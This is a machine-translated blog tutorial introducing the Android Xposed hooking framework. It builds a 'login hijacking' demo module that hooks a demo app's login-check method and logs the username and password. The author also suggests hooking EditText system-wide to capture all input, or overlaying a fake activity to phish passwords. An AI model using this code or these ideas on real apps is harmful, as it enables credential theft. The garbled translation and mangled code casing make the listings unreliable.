If you want to fly high, you should forget the horizon.
A while ago wrote an article about Cydiasubstrate's ad injection (address: http://blog.csdn.net/yzzst/article/details/47318751), everyone is very enjoyable. However, really understand this aspect of the students should this way, in fact, there is a more famous than Cydiasubstrate tool: XPosed.
Not because xposed than cydiasubstrate do much better, but xposed is completely open source. Today, we will give you a brief introduction of xposed, and write a simple landing hijack demo, let everyone quickly get started learning xposed.
Xposed
The xposed framework is a framework service that can affect the program to run (Modify the system) without modifying the APK, and the zygote process is programmed by replacing the/system/bin/app_process, making App_ The process will load Xposedbridge.jar this jar package during startup to complete hijacking of the zygote process and the Dalvik virtual machines it creates.
Based on the xposed framework, many powerful modules can be produced and operate simultaneously without conflicting functions.
In addition, each library in the Xposed framework can be downloaded separately, such as per app Setting (setting individual dpi or modify permissions for each app), Cydia, xprivacy (privacy breach prevention), Applications or features such as Bootmanager (open self-launcher management app) for native launcher replace icons are based on this framework.
Official address: http://repo.xposed.info/.
SOURCE Address: https://github.com/rovo89.
The xposed framework is based on an Android local Service application Xposedinstaller with a jar file that provides the API.
So, there are several steps we need to complete to install the xposed framework:
Install Local Service Xposedinstaller
To install the XPOSEDINSTALL.APK Local Service application, we can find, download and install it in the Framework section of its website. The address is:
Http://repo.xposed.info/module/de.robv.android.xposed.installer
After installing the Xposedinstaller application, you will see an interface that needs to activate the framework, as shown in 8-5. Here we click "Install/Update" to complete the activation of the framework. Some devices if you do not support direct write, you can choose "Installation Method", modified to install in recovery mode automatically.
Since the installation will require root privileges, the installation will start xposed app_process, so there will be multiple reboots of the device during installation.
TIPS: Because the domestic part of the ROM is not compatible with xposed, if the installation xposed unsuccessful, forcing the use of recovery write may cause the device to restart repeatedly and will not start properly.
Download using API Library
Its API library Xposedbridgeapi-.jar (version is Xposedapi, as we are here is the Xposedbridgeapi-54.jar) file, we are able to find it in the official support XDA Forum of Xposed, whose address is:
http://forum.xda-developers.com/xposed/xposed-api-changelog-developer-news-t2714067
After the download, we need to copy the Xposed Library to the Lib directory (note that the Lib directory is not an Android-provided Libs directory), and then add the jar package to the Build PATH
If you place the jar package directly under the Libs directory, you will likely produce an error "Illegalaccesserror:class ref in
Pre-verified class resolved to unexpected
Implementation ".
It is estimated that the Xposed author also references Bridgeapi within its framework, so that the operation avoids duplicate references.
Actual combat, landing hijacking (principle)
Before with everyone also said to use cydiasubstrate for advertising injection (address: http://blog.csdn.net/yzzst/article/details/47318751), many netizens ask me, can only simply inject an advertisement, What else can you do?
Landing Hijack!!!, you heard the wrong, today we have a simple demonstration here, how to hijack an application login function, and the account password to print out.
such as our common landing hijacking, is the use of hook technology to complete. So how is this landing hijacking done? Let's take a look at some of the landing examples we've seen in development. First, let's look at what a common landing interface looks like.
The corresponding login process code is as follows:
//The onclick event of the login buttonMloginbutton.setonclicklistener (NewOnclicklistener () {@Override Public void OnClick(View v) {//Get user nameString username = museredittext.gettext () +"";//Get passwordString password = mpasswordedittext.gettext () +"";if(Iscorrectinfo (username, password)) {Toast.maketext (mainactivity). This,"Successful landing!" ", Toast.length_long). Show (); }Else{Toast.maketext (mainactivity). This,"Login failed!" ", Toast.length_long). Show (); } }});
We will find that the user information on the login interface is stored on the EditText control, and then manually clicking the "Login" button will send the above information to the server to verify that the account and password are correct. This is very simple, hackers only need to find the developer in the use of the EditText control GetText method of network authentication method, hook the method, you can hijack the user's account and password robbed.
TIPS: Of course, we can also follow the example of previous Cydiasubstrate AD injection (address: http://blog.csdn.net/yzzst/article/details/47318751), Do an identical activity, in hijacking the original activity priority to bounce out, to deceive users to obtain the password.
The specific process is as follows:
Combat, landing hijacking (code)
Understand the principle below we will actually operate once, here we choose to use the xposed framework to operate. The use of xposed to hook operation is mainly used in the xposed two more important methods, Handleloadpackage get the package load callback and get its corresponding ClassLoader ; Findandhookmethod hooks the method of the specified class. Their detailed definition is as follows:
/** * 包加载时候的回调 */public void handleLoadPackage(final LoadPackageParam lpparam)/** * Xposed提供的Hook方法 * * @param className 待Hook的Class * @param classLoader classLoader * @param methodName 待Hook的Method * @param parameterTypesAndCallback hook回调 * @return */
Of course, our use of xposed for hooks is also divided into the following steps:
1. Configure the plug-in name and API version number in the Androidmanifest.xml file
<applicationandroid:allowbackup="true"android:icon="@drawable/ Ic_launcher "android:label=" @string/app_name "android:theme=" @style/ Apptheme " > <meta-dataandroid:name= "xposedmodule"android:value=" True " /> <!--module description -- <meta-dataandroid:name= "xposeddescription"android:value=" An example of landing hijacking " /> <!--minimum version number -- <meta-dataandroid:name= "xposedminversion"android:value=" " /> </Application>
2. Create a new entry class and inherit and implement the Ixposedhookloadpackage interface
The following actions, We created a new class of Com.example.loginhook.Main and implemented the Handleloadpackage method in the Ixposedhookloadpackage interface, filtering out the application of the non-Com.example.login package name, that is, we only operate the package name For the application of Com.example.login. As shown below:
public class main implements ixposedhookloadpackage { /** * callback when package is loaded */ public void handleloadpackage ( Final loadpackageparam Lpparam) throws throwable {//remove the if from the application that is not com.example.login the package name (!lpparam.packagename.equals (
"Com.example.login"
) return ; XposedBridge.log ( "Loaded app:" + lpparam.packagename); }}
3. Declaring the main entry path
You need to create a new Xposed_init file in the Assets folder and declare the main entry class in it. Here, our main entry class is Com.example.loginhook.Main.
4. Using the Findandhookmethod method hook hijacking the login information
This is one of the most important steps that we have previously analyzed that need to be done in this step. As we have previously analyzed the login procedure, we need to hijack is the need to hook its com.example.login.MainActivity in the Iscorrectinfo method. We use the Findandhookmethod provided by Xposed to perform methodhook operations directly (similar to Cydia). Use the XposedBridge.log method in its hook callback to print the login password information to the xposed log. The operation is as follows:
Import StaticDe.robv.android.xposed.XposedHelpers.findAndHookMethod; Public class Main implements ixposedhookloadpackage { /** * Callback when package is loaded * / Public void Handleloadpackage(FinalLoadpackageparam Lpparam)throwsThrowable {//Remove the application with the package name not Com.example.login if(!lpparam.packagename.equals ("Com.example.login"))return; XposedBridge.log ("Loaded app:"+ Lpparam.packagename);//Hook mainactivity in Iscorrectinfo (string,string) methodFindandhookmethod ("Com.example.login.MainActivity", Lpparam.classloader,"Iscorrectinfo", String.class, String.class,NewXc_methodhook () {@Override protected void Beforehookedmethod(Methodhookparam param)throwsThrowable {XposedBridge.log ("Start hijacking."); XposedBridge.log ("Parameter 1 ="+ param.args[0]); XposedBridge.log ("Parameter 2 ="+ param.args[1]); }@Override protected void Afterhookedmethod(Methodhookparam param)throwsThrowable {XposedBridge.log ("The hijacking is over."); XposedBridge.log ("Parameter 1 ="+ param.args[0]); XposedBridge.log ("Parameter 2 ="+ param.args[1]); } }); }}
5. Launch our custom module in Xposedinstaller
The module application that is installed on Android devices after compiling does not take effect immediately, we need to check the module to be enabled in the Xpasedinstaller module option in order for it to take effect normally. Such as
6. Restart Verification
Restart the Android device and go to Xposedinstaller to view the log module because we used the XposedBridge.log method to print the log, so log will be displayed here. We found that the password we need to hijack the account is displayed again here.
TIPS: Here we are through the reverse analysis of the landing page login judgment call function to complete the hook and hijack work. Some readers should think about it, can we hook it directly from the GetText () method in the Control EditText (input box control) provided to us in the system? This allows us to monitor all inputs in the system and hijack them. Here is a thought for you, interested readers can try.
Finally, hope to exchange learning, you can add my personal, we learn from each other progress.
/*
* @author Zhoushengtao (Zhou San)
* @since August 14, 2015 12:17:22
* @weixin stchou_zst
* @blog http://blog.csdn.net/yzzst
* @ Exchange Learning QQ Group: 341989536
* @ Private qq:445914891
/
Copyright NOTICE: Reprint please mark: Http://blog.csdn.net/yzzst. This article for Bo Master original article, without Bo Master permission not reproduced.
Android Hook Artifact--xposed Primer (Login hijacking demo)